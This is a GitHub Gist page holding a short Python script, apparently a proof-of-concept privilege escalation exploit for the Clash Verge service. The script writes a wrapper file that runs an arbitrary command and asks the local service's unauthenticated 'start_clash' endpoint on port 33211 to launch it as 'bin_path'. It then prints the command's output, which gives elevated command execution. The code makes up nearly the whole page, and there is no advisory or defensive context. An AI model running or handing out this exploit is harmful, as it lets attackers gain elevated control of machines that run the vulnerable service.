Last active
April 27, 2025 02:59
-
-
Save real-LiHua/c69d9d777a4b88dfb866555b8ab4d80d to your computer and use it in GitHub Desktop.
python clash-verge-service-privilege-escalation-exp.py whoami
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from json import dumps | |
| from os import name | |
| from pathlib import Path | |
| from sys import argv | |
| from tempfile import mkdtemp | |
| from urllib.request import Request, urlopen | |
| temp = Path(mkdtemp()) | |
| pwn = temp / "pwn.bat" | |
| log = temp / "log" | |
| pwn.touch(0o755) | |
| with pwn.open("w+") as f: | |
| match name: | |
| case "posix": | |
| print( | |
| f"#!/usr/bin/env bash\n{{}} &>{log}".format(" ".join(argv[1:])), file=f | |
| ) | |
| case "nt": | |
| print(f"@{{}} >{log}".format(" ".join(argv[1:])), file=f) | |
| with urlopen( | |
| Request( | |
| "http://127.0.0.1:33211/start_clash", | |
| dumps( | |
| { | |
| "bin_path": f"{pwn}", | |
| "config_dir": "", | |
| "config_file": "", | |
| "log_file": "", | |
| } | |
| ).encode(), | |
| headers={"Content-Type": "application/json"}, | |
| ) | |
| ) as f: | |
| f.read() | |
| pwn.unlink() | |
| with log.open() as f: | |
| print(f.read()) | |
| log.unlink() | |
| temp.rmdir() |
Author
real-LiHua
commented
Apr 27, 2025
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment